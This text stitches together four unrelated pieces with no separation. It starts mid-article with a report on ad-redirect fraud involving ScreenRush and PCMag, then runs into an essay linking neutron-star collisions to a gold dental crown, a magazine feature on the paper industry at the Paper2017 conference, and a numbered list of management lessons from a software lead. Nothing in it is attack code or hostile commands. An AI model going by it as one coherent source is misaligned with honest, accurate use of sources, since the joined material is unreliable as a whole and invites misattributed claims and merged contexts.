After clicking on an unrelated ad on a site in the ScreenRush scheme, Fou soon found his browser being redirected to an article page on pcmag.com. That page began loading and reloading what Fou called “a really malicious stack of redirects.” He documented the behavior in a video he uploaded to YouTube.

BuzzFeed News shared the video with PCMag at the time.

“We're taking this very seriously and have paused the ScreenRush test, as we conduct a deeper investigation,” a PCMag spokesperson wrote in a statement provided to BuzzFeed News. “PCMag has only recently and very sparingly been testing content recommendation services, which represent less than 1% of our traffic.”

When informed of PCMag’s statement and the activity that led to it, Aharonoff was nonplussed.

“It's unfortunate that [they] took that position,” he said in an email. “They onboarded, asked for KPIs we specifically delivered on which is the [time on site] you precisely saw. They are correct in that their buy was very insignificant, enough for you to buy my lunch at a not so fancy kosher restaurant.”




How Raganwald Lost His Crown


This is the legend of “How Raganwald Lost His Crown.” Attend closely, for it contains within it the answers to many of the riddles of the universe. And in the telling and retelling of this story, we are reminded of our place upon our earth and within the firmament of the heavens.


the story of the first star

A very, very long time ago, there was a star. It was much more massive than the star that lights our sky, maybe ten or twenty times as massive. It shone for a very long time, its spent nuclear fuel forming a great, iron-rich core. The nuclear fuel within this core burned out first, and the core shrunk until the only thing preventing it from further collapse was electron-degeneracy pressure, the quantum resistance of electrons from occupying the same place and state.

As the star surrounding the core continued to burn, it deposited even more mass upon the core, and then suddenly the gravitational force overcame the electron-degeneracy pressure and the core collapsed even further. An enormous amount of energy was released, heating it to the point where the iron atoms disintegrated into alpha particles.

The temperature continued to rise, and the protons in these alpha particles captured electrons, forming neutrons and releasing neutrinos in a great wave. The neutrons packed together more tightly, forming a much smaller, hyper-dense neutron sphere. Meanwhile, the blast of neutrinos blew what was left of the active shell surrounding the core into a supernova.

We did not see the supernova.

Neither did the dinosaurs, nor any other life on earth. Although it happened far away from where we are now, this happened so long ago that its visible light passed this place long before our star was even born.


The Crab Nebula


the neutron star

What remained behind was a neutron star. Its mass was maybe twice that of our sun, packed into a sphere perhaps 20 kilometers across. Very massive, but not enough for gravity to collapse it even further and create a black hole. But very massive!

It would be impossible to stand on its surface, but if somehow I travelled back in time, and if somehow I travelled to this neutron star, and if somehow I weighed myself, I would have found that while my scale tells me that I am about 86 kilograms on Earth, I would have weighed 8.6 trillion kilograms on this neutron star.

If I decided that this weight was not to my liking and I wanted to fly away, I would have needed to accelerate to as much as half the speed of light to escape its gravity well.

The gravity was so strong that if I was standing on the surface (impossibly!), and was wearing a headlamp for illumination, I would have been able to see all the way around the neutron star to the other side, because its gravity would have bent light into a semi-circle. I might have lifted my Apple Watch and said “Hey Siri, record a note.” If I was using the Apple Watch Neutron Star Edition of watchOS, it would have had to correct for time dilation between time at my waist and time at my shoulder.

There are many other incredibly interesting things about neutron stars. They spin. They emit beacons of x-ray energy that sometimes fall upon our earth in regular pulses, creating “pulsars.” The remnants of the supernova that they created may envelop them creating a “nebula” that they illuminate with their energy.

One such nebula is the Crab Nebula, pictured above.


Gravitational Waves


the collision

Neutron stars do not hang, fixed in space. Nothing really does. Gravity and momentum move everything around in the dance of the heavens. And from time to time, a neutron star encounters another. Their massive gravities pull them towards each other. They may bend their paths and then continue on their way. They may wind up forming a binary system. Or they may actually collide.

When they collide, a massive gravitational wave is created. Gravitational waves were first proposed by Henri Poincaré in 1905, but most people associate them with Albert Einstein, who predicted them ten years later within the framework of his General Theory of Relativity, one of the great human intellectual achievements. Humans have been looking for evidence of gravitational waves ever since, but it was almost exactly 100 years later, in 2015, that we detected them, and the results were announced in early 2016.

In August of 2017, the Laser Interferometer Gravitational-Wave Observatory detected a gravitational wave, GW170817, produced by two neutron stars spiralling together just before they collided. When neutron stars merge, they are thought to either create a newer, more massive neutron star, or a black hole if their combined masses are large enough.

But there is more to the story than that. As noted, their spiralling together creates gravitational waves. A massive magnetic field, trillions of times stronger than that of Earth, is created in milliseconds. And a kilonova occurs: gamma-ray bursts and electromagnetic radiation from material that decays as it is ejected from the merging neutron stars.

Kilonovae are very interesting. The neutrons in neutron stars are held together by gravity. But material ejected in the cataclysmic merger is no longer held together by gravity. It “decays” back into ordinary matter.


gold


heavy metal

Physicists have long been interested in heavy metals like gold. The “normal” fusion process within a star does not create substances like gold. The abundance of such metals on Earth puzzled humans. Astrophysicists realized that one way heavy metals might be created would be if an extremely large star, like a red giant, contained lots of iron created from fusion. As the star burns, the iron would slowly “capture” neutrons thrown off by the fusion reaction. Some of those neutrons become protons, and the iron transmutes into heavier matter, eventually creating matter like bismuth.

This process, called the s-process, or “slow” process, is thought to account for about half of the heavy materials in the Universe. But the s-process doesn’t account for even heavier substances like Uranium, nor is it thought to account for more than about half of the matter it can create.

Astronomers came up with another possibility, the r-process. What if matter ejected from events like the merger between two neutron stars decayed into elements like uranium or gold? It would take something like kilonovae to explain the amounts of materials like gold or platinum observed in the universe.

Remember gravitational wave GW170817? This was produced by the merger of two neutron stars, and unlike the four gravitational waves detected before it, it was independently observed by 70 observatories around earth as its event was accompanied by a massive amount of electromagnetic radiation.

When two black holes collide, there is no observable radiation because their gravity does not allow light to escape. Gravity waves are our only hint that anything has happened. But neutron stars are different. They are massive enough to create gravity waves, but not massive enough to prevent light from reaching us alongside the gravity waves. And that’s what happened.


Spectroscopic Observation of Gold Nanoparticles


spectroscopy

Light tells us a lot about the process that created it. Spectroscopy is the study of the interaction between matter and electromagnetic radiation. One form of spectroscopy, atomic emission spectroscopy, identifies the atomic composition of a material that gives off radiation by measuring the amplitude and frequencies of the radiation it emits.

One of the great early accomplishments in science was when astronomers, observing our Sun, noted an unknown yellow spectral line signature. In 1868, Norman Lockyer predicted that it must be created by a hitherto unknown element, which he named “Helium” after the Greek Titan of the Sun, Helios. In 1895, two Swedish chemists detected helium in ore samples here on Earth, and in the great tradition of the scientific method, we had a theory, a prediction, and a confirmation of the theory by test.

And this very year, we repeated the process. Astrophysicists had predicted that the merger of two neutron stars would create kilonovae, and that the r-process decay would produce heavy elements. And when those seventy observatories focused on the source of the gravitational wave GW170817, what did spectroscopy reveal?

Gold. And plenty of it. And other heavy materials, and plenty of them. The theory had passed its test: we knew that gold was produced when two different suns collapsed to produce two neutron stars that would eventually collide. This confirmation knocked away yet another support for the argument that there are things in our universe that science cannot explain, that we as a species cannot understand.

This was a glorious observation, and you and I were alive to witness the popping of champagne corks around the world.


LH 95 stellar nursery in the Large Magellanic Cloud


the nursery

Remember our neutron star? It wandered, it collided with another star, it ejected some of its matter, perhaps the very chunk that I had–in a thought experiment only–stood upon. It formed a new neutron star, and carried on. But what of its ejected matter?

As we noted, that decayed into various heavy elements, some of which were gold. The matter formed interstellar dust. And while some of it stayed within the gravitational field of the newly merged neutron star, some of it, propelled by the vast energies created in the merger, flew away from the neutron stars to wander, alone, in the universe.

In time, it was attracted by other matter, in a great cloud we call a nebula. At the center of this great cloud, gravity pulled the matter together into lumps. Our matter was gold, but most of the nebula was lighter elements, predominantly hydrogen, the lightest element.

Gravity acted to make the lumps lumpier. They sucked nearby material into them. The gravity compressed them together, swirling and spinning, flattening into discs with a massive bump in the center. As they compressed, they heated. At a certain point, when the temperatures at the cores of these super-compressed lumps reached about 10 million kelvin, the hydrogen began to fuse into helium.

Stars were born. The nebula had become a nursery.


Our Sun


our sun

One of these stars was about one solar mass. Spinning around it was a huge accretion disc. Gravity within that disc made it lumpy, and the lumps coalesced into spinning spheres orbiting the star. Other lumps passing by were sucked into the star’s gravity well and took up irregular orbits. Some began to orbit the spheres orbiting the star, forming satellites.

The star was our sun. The third lump from the star was our earth. Our earth was compressing itself under its own gravitational field. The heaviest elements fell to its centre, just as they do in a star. A core of mostly iron formed, just like that star that would birth the neutron star. Our gold fell into it, along with lots of passing uranium.

The uranium was radioactive and decaying. This caused a chain reaction, but not the kind that explodes: there were too many other elements mixed in, acting like the control rods of a nuclear reactor. So the uranium just got hot, and it is still hot to this day. The heat of compression and of this slow-burning nuclear decay turned the core to molten metal, with a solid crust on the outside.

At some point, a satellite came crashing into the earth, so hard and so fast that about a third of the earth was blasted into space. It didn’t go far–the debris formed a ring around the earth, and gravity eventually compacted it into a single satellite, our moon, but a satellite much larger than our planet’s gravity would normally be able to capture.

The iron core formed a huge magnet. An atmosphere formed. Life formed. The magnet bent electromagnetic rays such that it helped to shield life from the universe. Another shield was formed by ozone in the atmosphere. And the moon, the satellite that is much larger than would be expected for a planet our size, formed a third shield, attracting meteors and other flying debris so that extinction-event meteorites would be much more infrequent than expected.

Our world had become a nursery for life. The seas filled with creatures. Many such tiny creatures, when they died, sank to the bottom of the seas. Their corpses piled up, eventually to be compressed into oil. Other creatures crawled onto the land, and then the land and skies filled with life. Plants developed the wood fibre lignin. For a very long time, nothing evolved to eat or break down lignin, so when trees died, they did not decay and they, too, piled up and would be compressed into coal.


The Cretaceous–Paleogene extinction event


we enter the story

Life continued to evolve. The most dominant (as we define dominance in our own image) came to be the dinosaurs. Remember the extinction-event meteors that the moon was shielding us from? One got through sixty-six million years ago, the Cretaceous–Paleogene extinction event, forming the Chicxulub crater.

The dinosaurs were nearly wiped out. The survivors became avians, and the ecosystems the world over changed drastically. A small homeothermic creature that specialized in night-hunting filled the now available opportunities, multiplied, and became a minor success story.

One of its descendants walked on its hind legs and became us. We explored, grew, fought each other, became superstitious, discovered science and reason, rejected it, and fought some more. We took the bounty of coal and leveraged it into an explosion of industry and transportation. Having mastered the other creatures, our dominant behaviour became manipulating each other through social engineering.

Today, the battle between superstition and science is one of the most hotly contested battlegrounds. But science hasn’t gone away. Science made it possible for us to learn this story, and us to share it in this form. Science trains our doctors and dentists. Science helps us create healthy foods, and sugary snacks that we like.


X-ray image of previously root canal treated tooth


the crown

One day, one of us humans–Raganwald–had a pain in his jaw. He went to a dentist, who used radiation to see what his eyes could not, to look into solid matter, and to see that he had an infection in the nerve of a tooth. The dentist sent him to a specialist, who drilled a hole in the top of the tooth, and then extracted the root without removing the tooth.

The specialist closed the hole with a temporary filling, and when all had healed satisfactorily, Raganwald returned to the dentist, who fitted the tooth with a crown. All was well for about twenty years, but alas, the infection returned. This time, there was nothing to do except remove the tooth.

The dentist removed Raganwald’s crown, then the tooth. Raganwald may get an implant put in to replace the lost tooth. But as a souvenir, the dentist gave Raganwald the crown to keep. “It’s gold, you can get something for it.” Yes, Raganwald could get something for it. Something more valuable than the monetary value of gold.

Here it is, Raganwald’s crown:


Raganwald's crown


the lesson

Let us look upon Raganwald’s crown.

Do you now see the matter from a long dead star, that became a neutron star, that danced with, and then embraced, another neutron star, and in their fiery coupling, created this gold? Is this crown not the reminder of its journey from star to planet to crown to this simple plastic box–made from the oil laid down millions of years ago?

And is it not fitting that Raganwald lost his crown the very year that we humans confirmed that its gold had been forged in the collision of two neutron stars, long before our own sun began to shine? Does this not remind us of how small we are, and yet how great is our thirst for learning?

Hark to the lesson of this story: Everything has an explanation.

Some processes may take millions or billions of years to complete. Some conjectures may take a century to be confirmed. But the universe obeys laws, laws that we can discover through reason and scientific investigation. And the arc of human history bends towards reason, not ignorance and superstition.

The loss of Raganwald’s crown proves it.



Why a ‘paperless world’ still hasn’t happened


Old Mohawk paper company lore has it that in 1946, a salesman named George Morrison handed his client in Boston a trial grade of paper so lush and even, so uniform and pure, that the client could only reply: “George, this is one super fine sheet of paper.” And thus Mohawk Superfine was born.

This premium paper has been a darling of the printing and design world ever since. “Superfine is to paper what Tiffany’s is to diamonds,” Jessica Helfand, co-founder of Design Observer magazine once said. “If that sounds elitist, then so be it. It is perfect in every way.”

Mohawk tells the Superfine origin story every chance it gets: on their website, in press releases, in promotional videos and in their own lush magazine, Mohawk Maker Quarterly. And now Ted O’Connor, Mohawk’s senior vice president and general manager of envelope and converting, is telling it again. He sits on an ottoman in a hotel suite on the 24th floor of what a plaque outside declares is “The Tallest Building in the World with an All-Concrete Structure”. It’s day one, hour zero of Paper2017 in Chicago, the annual three-day event at which the industry, its suppliers and its clients come together to network and engage in “timely sessions on emerging issues”. Attendees are rolling in and registering, and the Mohawk team is killing time before wall-to-wall meetings.

The Superfine story is personal for Ted. George Morrison was his great uncle. His grandfather, George O’Connor, started the company when he acquired an old paper mill at the confluence of the Hudson and Mohawk rivers in upstate New York. Ted’s father, Tom Sr, took over in 1972. Now, his brother, Tom Jr, runs the fourth-going-on-fifth-generation paper company.

Once Ted finishes the story, we talk about the paper industry – where it’s been and where it’s going. “Years ago, when I used to go to these types of meetings with my father, there were probably 16 mills – Strathmore, Hopper, Rising, Simpson, Mohawk, Beckett … We’d talk about trends in the industry and distributors and things like that, and, um … ” He stops to reflect. “They’re all gone.”

He lets that sink in for himself.

“Because they sat there and made just what they made for 30 years, and it kind of gets obsolete.”


“Paper is Good.” So reads the packaging on a ream of 8.5in by 11in, 20lb, white (92 on Tappi’s T-452 brightness scale), acid-free, curl-controlled, ColorLok Technology®, elemental chlorine-free, Rainforest Alliance Certified™, Forest Stewardship Council® certified, Sustainable Forestry Initiative® Certified, Made in USA Domtar EarthChoice® Office Paper. “Great ideas are started on paper,” the packaging reads. “The world is educated on paper. Businesses are founded on paper. Love is professed on paper. Important news is spread on paper.”

Domtar is right: paper has played “an essential role in the development of mankind”. And yet, for decades, civilisation has been trying to develop beyond paper, promoting a paper-free world that will run seamlessly, immaterially on pixels and screens alone. How did paper get here? Where does it go next? For that matter, why is paper – which does its job perfectly well – compelled to keep innovating?

On 26 March, I step into The Tallest Building in the World with an All-Concrete Structure, ready to find out. Billed as “THE annual networking event for the paper industry”, Paper2017 consists of just three panels and presentations across its three-day agenda. The rest of the time is dedicated to what are called “suites” – well-appointed hotel rooms that serve as basecamp, conference room and informal networking space all in one. Alas, because I am a journalist with zero interest in selling or being sold anything, I score only a few suite dates in my time at Paper2017. Instead, I spend a good amount of my time in a communal catch basin of sorts called the “connections lounge” (CL).

A paper mill in Minnesota. Photograph: Alamy

The CL is a great place to sip $5 cups of coffee and thumb through the latest issue of the Paper2017 Convention Daily, published in three separate editions for each day of the conference, and printed on an obscenely large 16in by 11.75in glossy tabloid that serves as an oversized “screw you” to palm-sized devices. It is printed by O’Brien Publications, which also publishes PaperAge magazine, the newspaper of record for all things pulp and paper since 1884.

I stroll through the CL, drawn to an unmanned National Paper Trade Association table piled high with juicy-looking literature on paper’s many virtues. I take one of each and sit down at a cocktail table to thumb through my haul of brochures announcing paper “myths” and paper “facts”. Above, the glass beads of a chandelier sway almost imperceptibly in the air conditioning.

A tall, thin man introduces himself to me as Neil. “So, what brings you to Paper2017?” he asks. I give my thumbnail sketch – journalist, piece about paper, etc. And now it’s his turn: something something something cloud-based software, something something business intelligence analytics, something something manufacturing profitability improvements. Later I would see Neil approach at least three other tables, on the prowl for potential clients. He tells me he grew up in paper’s Silicon Valley: Wisconsin. His dad worked in the mill and he grew up in company homes. One day a Finnish corporation bought the mill and moved the whole process to Finland, leaving a shuttered plant behind. Neil tells me about his son, who is double-majoring in public policy and English, but who “didn’t tell his dad about the English part”. Dad seems displeased by this: “He made it tougher on himself.” And then, perhaps remembering that he was speaking with a man of letters, he quickly adds: “But, no, I have a lot of affinity for writers, people who write.”


Ts’ai lun, a Chinese eunuch and privy councillor to Emperor Ho Ti, gets the credit for inventing what today we recognise as paper, in AD105. The basic formula remains unchanged. Some fibrous material – rags or wood – is mashed up, mixed with water to make pulp, then strained through a screen. Matted, intertwined fibre remains, held together by the same hydrogen bonds that twist DNA into a helix. This is dried and cut into paper.

The technology spreads from Asia through the Arab world, eventually landing in Europe circa 950. All the glory goes to Gutenberg for his printing press of 1440, but his metal movable type would have been nothing more than an oversized doorstop if there had been no paper for it to press upon. Paper historian Dard Hunter states the case clearly: “If man may now be considered as having reached a high state of civilisation, his gradual development is more directly due to the inventions of paper and printing than to all other factors.”

It is all the more shocking, then, how many times paper’s death knell has tolled through the halls of universities, corporations, governments, newsrooms and our own homes. Like fusion power, the paperless world has been just a decade away for the past half century, approaching but never arriving.

In the mid-70s, Businessweek published an article by the head of Xerox’s research lab that is credited for first putting down (on paper) a vision of a paperless “office of the future”. It painted a not-incorrect picture of future workers going about their business accessing and analysing information on screens. And yet paper continued its ascent: global consumption grew by 50% between 1980 and 2011.

On the factory floor at a paper mill in South Carolina. Photograph: Bloomberg via Getty

Why? Abigail J Sellen and Richard HR Harper, respectively a principal researcher at Microsoft Research Cambridge and co-director of Lancaster University’s Institute for Social Futures, have a few solid theories. First, they note that computers and the internet brought unprecedented access to information – information that, while accessed digitally, was still best consumed on dead trees. Second, printing technology became so small, cheap and reliable that just about anybody with a computer could also afford their own on-demand press.

“We have heard stories of paperless offices, but we have never seen one,” Sellen and Harper wrote in their book The Myth of the Paperless Office. “More commonly, the introduction of new technology does not get rid of paper; it increases it or shifts the ways in which it is used.” The catch here is that the book was published in 2002, just before luminous smartphone screens took a hold of the same paleomammalian cortex that steered early Homo sapiens toward fire’s glow.

Since then, screen resolutions, load times and user interfaces have improved dramatically, striving toward a functional ideal that, ironically, looks and feels a lot like paper. Just this year, a startup called reMarkable launched a tablet that offers “the most paper-like digital writing experience ever”. Technology is a snake that eats itself.

And yet! Still no paperless world.


By 9.54am on day two of Paper2017, the CL has reached peak capacity and peak caffeination. Old friends are reconnecting, deals are being done. I’m sitting alone at the cocktail table, waiting for my next suite rendezvous. I see the strictly enforced lanyard-wearers-only policy being strictly enforced on a trio of lanyardless suits. My official lanyard notwithstanding, I feel guilty taking up increasingly rare deal-making space. Time to stretch the legs.

Out on the sidewalk, I turn around to peer up the length of Paper2017’s homebase, The Tallest Building in the World With an All-Concrete Structure. When the building was completed in 2009, the Chicago Tribune’s architecture critic, Blair Kamin, wrote that it was “not vulgar, respectable enough, but still short of Chicago’s soaring architectural standards”. Kamin was less kind when the building later unveiled a finishing touch: five serifed, all-caps letters, spanning nearly the length of half a football field, spelling out the developer’s name: T-R-U-M-P.

So bad was this sign – slung low on the facade, where no other Chicago building had dared to brand before – that the building’s architect reportedly emailed Kamin to say, “Just for the record, I had nothing to do with this sign!” Kamin called it “as subtle as Godzilla”, and a “poke in the eye”, and pretty much everybody in Chicago agreed. It really is a terrible sign.

Curiously, despite his name hanging hugely on the outside of the building – not to mention printed on every napkin, coffee cup, water bottle, pen and pad of paper inside – Trump is mentioned to me only twice during Paper2017. Once is in terms that remind me of the weeks of pained post-election analysis about how urban elites had failed to heed the struggles of the working class: “When you get out in the rural part of our country, and you see what’s happened … regardless of what your political affiliation is, I can tell you, Donald Trump tapped into something,” says Mike Grimm, CEO of American Eagle Paper Mills in Tyrone, Pennsylvania (population 5,301).

Grimm talks about the role the mill had played in the town’s history. His own great-grandfather, an Italian immigrant, worked in the machine room. Grimm remembers the paper mill’s whistle directing not just the shifts of the mill workers, but also the lives of the town’s residents.

And yet, in 2001, the mill shut down, as its large corporate owner consolidated. It was a blow to the region, but two years later a group of former mill managers pooled their resources and reopened it as American Eagle. “Especially today, when you lose that type of income out of a small town, it just can’t be replaced,” Grimm says.


A non-professional can only take so much discussion of sustainable wood procurement, the neuroscience of touch, “connected packaging solutions” and the potential for using paper sludge and fly ash to offset oil-based polypropylene in plastic composites. Halfway through the conference, I ache for news beyond Paper2017, and start thumbing through the headlines on CNN, Fox News and the New York Times. Regret sinks in immediately. I retreat back to the appropriately mobile-unfriendly PaperAge.com and bathe in the insular warmth of headlines such as “Pratt Industries Officially Opens New Corrugated Box Factory in Beloit, Wisconsin”, “Sonoco-Alcore to Increase Prices for Tubes & Cores in Europe”, and “Mohawk’s Tom O’Connor Jr and Ted O’Connor Earn AIPMM’S 2017 Peyton Shaner Award”. That last article, really just a reprint of a Mohawk press release, contains this lovely remark from a paper industry colleague: “[Tom and Ted] are lions in our industry that represent the first family in paper with old-fashioned values and exciting new products and services that make this crazy business fresh and fun. When the O’Connor family succeeds, we all succeed.”

On the third and final day of Paper2017, the industry’s sobering choices are laid bare before us in two sessions featuring analysts from RISI, a market-research firm that considers itself “the best-positioned and most authoritative global source of forest products information and data”.

In the first session, we learn that the global demand for printing and writing (P&W) paper has been in steady decline since 2008. These are the papers most of us think of when we think of paper: the uncoated mechanicals, the uncoated freesheets and woodfree, the coated mechanicals and coated woodfree, the coated freesheets – ie, what composes directories, paperback books, newspaper inserts, low-end magazines and catalogues, direct (junk) mail, envelopes, brochures, photo printing, menus, posters, stationery, legal forms, and the iconic 8.5in by 11in office copy paper. They are suffering the combined assault of social media, email, tablets, e-billing, e-readers, laptops, smartphones, online forms, banner ads etc. Worldwide demand for P&W paper fell by 2.6% in 2015, according to RISI. Preliminary data suggests it fell by 2.2% in 2016, and RISI forecasts it will continue to fall by another 1.1% in 2017 and 2018.

But there’s more to paper than printing and writing. Market trends session No 2 focused on global paper-based packaging and recovered fibre, where the outlook is much brighter. There is talk of an “Amazon effect”, paired with a slide showing several boxes within boxes and paper padding used to ship one tiny bottle of vitamins. Big Paper is learning to sustain itself by encasing e-commerce gold. The internet taketh away, and the internet giveth.

You’re seeing more paper in food and drink packaging, too. RISI chalks this up to increasingly negative public attitudes toward plastic packaging. Plastic-bag bans and taxes are popping up all over the place. RISI illustrates the trend with a photo of a sea turtle ensnared underwater in plastic wrap.

And then there’s tissue. It may not be the first thing we think of when we think of paper, but Big Paper is indeed very much in the business of selling toilet paper, facial tissue, paper towels and “feminine products” – and business is good. You can’t blow your nose into an email. In the end, we are material. We have inputs and outputs. We require physical receptacles. And more of us are on the way. RISI foresees a 3% annual rise in global tissue demand through 2018, and a 1.4% rise in global paper demand overall.

Even Mohawk, which is firmly planted in the printing and writing segment, is optimistic. “We tend not to listen to all this,” says Ted, back in the Mohawk suite, holding up the Paper2017 program. “Trends and this and that.” He shakes his head dismissively. According to Ted and Tom, Mohawk has been growing by around 3% or 4% a year.

It seems Mohawk might understand something that others in the industry do not. While many larger paper companies were reacting to the prods of market wonks and consultants by reinventing themselves as manufacturers of toilet tubes or Amazon packaging, Mohawk had been doubling down on its original value proposition: making really great paper. Amid the chaos of beeping, buzzing and blinking, Mohawk now stands out as a quiet, focused manufacturer of the world’s simplest publishing platform – one that actually gives its users pleasant haptic associations.

It’s not that Mohawk ignores the digital revolution; rather, they have made a choice to sell the ethos of paper to the digitally fatigued. Melissa Stevens, Mohawk’s senior VP of sales, hands me Mohawk’s Declaration of Craft, an absolutely gorgeous piece of printed material chock-full of new-agey thingness. Its thesis: “In an era of impermanence, an extraordinary movement has emerged. A movement of makers where craftsmanship and permanence matter now more than ever.”

Mohawk’s communication strategy is built around this “maker” movement, which is illustrated with hipsters throwing clay in their basements, forging wrought iron and side-hustling in saxophone design. It’s impossible to tell if this is brilliant marketing or sheer impudence, or both.

The staff of paper company Dunder Mifflin in US sitcom The Office. Photograph: Mitchell Haaseth/NBC Universal, Inc.

My mind keeps returning to one particular episode of The Office, the great sitcom that followed (in its US version) the employees of Dunder Mifflin, a small paper sales company in Scranton, Pennsylvania. Pam Beesly, the receptionist, is having a bad day. The handful of friends and co-workers who have shown up for her art show mostly just yawn at her still lifes and exurban landscapes. One character dismisses it as “motel art”. But just as Pam is about to leave, her boss, Michael Scott, shows up. He has had a rough day, too – he has been made a fool of by his own subordinates, and by business-school students smugly assured of paper’s doom.

Pam’s art mesmerises Michael. “My God, these could be tracings,” he says, pure of heart. He insists on buying her painting of the office. Pam’s eyes grow wet. So do Michael’s. “That is our building,” he says, “and we sell paper.”

It is the best scene in the series. I watch it, and I feel the victory of earnestness over a world of naysayers. We cut to Michael back at Dunder Mifflin, hanging the painting of the office in the office on The Office. “It is a message,” he says. “It’s an inspiration. It’s a source of beauty. And without paper, it could not have happened … ”

He pauses to consider this. “Unless you had a camera.”


Imagine that, instead of paper, the computer and all its accoutrements came first. In a flash of divine perception, a Chinese eunuch under Ho Ti’s reign conceives of binary systems, electronic circuits, vacuum tubes, capacitors, Boolean logic, transistors, integrated circuits, microprocessors, keyboards, floppy disks, CD-ROMs, zip drives, HTML, CSS, JavaScript, modems, routers, email, wifi, AOL, Google, Friendster, Napster, Myspace, Facebook, Twitter, gifs – all at once. And so, for nearly two millennia, the human race lives in a paperless, digital world.

Then, sometime in the middle of the 20th century, scientists at MIT, Stanford and the US Department of Defense begin to search for a better way to store and share their ideas. They experiment with mashing up old rags and wood to mix with water, draining the mixture through a screen and drying the matted fibres into sheets. The breakthrough makes its way into civilian life, and by the turn of the millennium most people in the developed world carry a pad of paper in their pocket.

Perhaps, in this version of events, we would regard paper as the superior technology, and not just because of novelty. After all, paper loads instantly. It requires no software, no battery, no power source. It is remarkably lightweight, thin and made from abundant, recyclable materials. Its design is minimalist, understated, calm.

Throughout Paper2017, people try to convince me (and perhaps themselves) that the Office-inspired stereotype of paper as aloof and backwards is wrong. Paper isn’t boring, they tell me; in fact, it’s an “exciting time for the industry”. They coopt the technophile’s word cloud – “innovative”, “disruptive”, “smart”.

And yet, at the very same time that it tries to showcase its innovative credentials, paper is also promoting a nostalgic counter-narrative, filled with references to family, American values and smalltown workers. Not unlike that of coal mines or auto plants, this story imagines paper mills as monuments to the fading promise of American industry.

Paper will survive in some form (packaging, toilet paper etc) and so, I’d wager, will both of these narratives. Meanwhile, as writers like me fret about the battle between digital and paper, the industry is shifting, like so many others, from a steady stable of family-run mills to a business model that breeds perpetual uncertainty, interpreted by consultants and navigated by anomalous corporate marketing entities. Behind all the optimistic talk of restructuring opportunities and rebranding initiatives, traditional careers in American paper are vanishing: according to the New York Times, Wisconsin alone has lost 20,000 paper factory jobs since 2000.

There aren’t many representatives at the conference of workers like Neil’s dad, who had actually manned those mills for generations; there are, however, plenty of consultants like Neil, who speak the language of metrics and markets effortlessly. I used to believe, probably like most people, that paper was just a simple canvas for my ideas. By the end of Paper2017, I want to believe that making paper could be everything: an artisanal craft and a family-run business and a developing-world growth opportunity and a packaging revolution. Yet I can’t help noticing how familiar are the marketing creeds I hear over and over at the conference: a 21st-century blend of techno-speak, nostalgia and nonsense.


The other time someone at Paper2017 mentions to me the man whose name hangs on the side of The Tallest Building in the World with an All-Concrete Structure is on the conference’s final morning. A friendly man from Belgium with a South Asian accent plops down in the armchair across from me, just outside the CL. I had met him briefly on the first day of the conference, and when I idly remark that there seems to be a lot of excitement in the paper industry these days, he quickly replies: “Excitement? Or fear?”

The man has some cursory relation to paper – he is in the import/export business – but it is a bit foggy to me. When we get on to the topic of technology, disruption and automation, he paints a much bleaker picture than I heard in any of my other conversations at Paper2017. Robots will one day replace truck drivers, and then chefs, and then even your primary-care physician, he says, absently spinning his smartphone between his left thumb and forefinger. In that case, I ask, what do you tell your children about their future career prospects?

“Be a salesperson,” he says. “If there is artificial intelligence, then they will be selling the robots.” He winks and smiles, and flips his smartphone again. “This is how it will be.”

I must look uneasy about all this, because he then tries to reassure me. He points to Europe as an example of a place where governments are getting ahead of this trend, requiring that employers pay extra into social security if they replace a human worker with a machine. He says he knows less about the situation in the US, but feels things would be OK.

“You have a nice president who is a businessman,” he says. “He’s not a politician. There is profit or loss in business, so you either win or lose. Some people don’t like that, but I think it will be good.”

A longer version of this article first appeared in The Point magazine


Things I have learnt as the software engineering lead of a multinational


A surprisingly long cycle has just closed for me and I think it’s a good time to share some lessons learned.

I have been collecting these points over the last six months, but none of them is recent: they have taken shape over a few years, and they include both things I did and things I failed to do.

Most of these points act as a personal reminder as well as a set of suggestions to others; don’t be surprised if some of them read as cryptic.

So, here it is. A summary of what I learnt in the last six years:

The productive organization

1. When the plan is foggy, that’s the moment to communicate as broadly as possible. In fact, you should not frame it as a plan; frame it as the situation and the final state you want to achieve. When you have a detailed plan, that’s when you DON’T need to communicate broadly. So, clearly state the situation and clearly state the foggy goal to everyone who will listen.

2. Don’t be prudish. If you fear that people will lose faith in you because of the foggy goals and the dire situation you describe, you are painting yourself into a heroic corner. People just need to hear and share the situation they are in. A common understanding acts as a bond among them and with you, which is all you need for them to work out the right answers.

3.  Don’t assume that a specific communication medium can’t be effective. Mass emails and top-down communication are not taboo: just because most such communications are irrelevant it doesn’t mean yours will be perceived as such.

4.  Teams don’t self-organize unless you organize them to do so.

5.   Fostering personal initiative in every developer requires showing the vital need for personal initiative. These are birds that mostly don’t fly out of the cage just because you open the door. You must find a way to show them that the cage is burning.

6.  People sitting side by side can communicate less than people sitting a continent apart. Communication is a chemical reaction that requires catalysts; co-locating people lowers the cost of those catalysts, but no setup creates communication automatically.

7.  Within a development organization both good and bad communication exist, but the difference is not a function of politeness or rudeness; it is much more a matter of clarity and goals. Learn what the good kind of communication looks like, find some examples, and use them as a reference for everyone.

8.  Fire people whenever you can. There is often someone to fire, but not many opportunities to do so. When you are given a lot of opportunities to fire people, it is usually because of a crisis, and you will likely fire or otherwise lose the wrong people. People appreciate it when you fire the right people, so don’t worry about morale. Also, the average quality of the team tends to rise more through dismissals than through recruitment.

9.  Hire only for good reasons. Being overworked is not a good reason to hire. Instead, hire to be ready to catch opportunities, not to survive the current battles.

10.  It’s often better to lose battles than to staff desperately and win desperate battles at all costs (World War I, anyone?).

11.  Don’t outsource recruitment; it must be the direct responsibility of everyone in the organization.

12. People must select their future colleagues. There are countless benefits in this, but it must not become a conclave: keep the process in the hands of the people who do the work, and make it as transparent as possible.

13.  Always favor actual skill testing in recruitment. When you don’t feel that you are directly testing the candidate’s skills, you are either not competent enough in that skill yourself or you have switched to playing a set piece (I call this The Interview Theatre), and you will ultimately decide on a whim. Not good.

14.  Build some of your teams as training and testing grounds for freshmen. Put some of your best people there.

15.  Lack of vision is not agile, it is not data-driven, it is not about ‘taking decisions as late as possible’, and it is not something you should paint in a positive light at all. It is just lack of vision, and it is not good.

16.  Construction work is not a good metaphor for software/product development. Neither is factory work. Allied junior-officer initiative during the first week after D-Day in WWII is probably a better guideline, but it is still not a good metaphor overall and, in any case, not well known enough to base your communication on.

Yourself

17.  Train people to do all of the previous points. Including this one.

18.  Don’t shy away from leading without doing; it is unavoidable, so just do it. Then do some work to stay pertinent.

19.  If you are not able to hire and fire people, leave. Or stay for the retirement fund if you can stomach it.

